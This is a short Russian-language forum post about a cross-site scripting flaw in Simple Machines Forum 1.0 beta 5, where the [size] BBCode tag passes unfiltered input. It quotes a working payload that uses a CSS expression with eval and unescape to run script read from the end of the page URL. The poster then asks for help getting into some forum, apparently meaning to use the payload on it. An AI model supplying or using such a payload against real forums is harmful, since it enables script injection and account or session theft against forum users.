Уязвимость в Simple machines smf 1.0 beta 5 public
 

Уязвимость обнаружена в Simple Machines SMF. Удаленный пользователь может выполнить XSS нападение.

SMF не фильтрует данные, представленные пользователем в тэге '[size]'. Пример:

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[size=expression(eval(unescape(document. URL.substring(document.URL.
length-41,document.URL.length))))]Big Exploit[/size][/QUOTE]<span id='postcolor'>

если кому не лень помогите мне с этим форумом разобраться,а то я уже весь мозг напряг http://forum.antichat.ru/iB_html/non...cons/smile.gif но так ничего и не придумал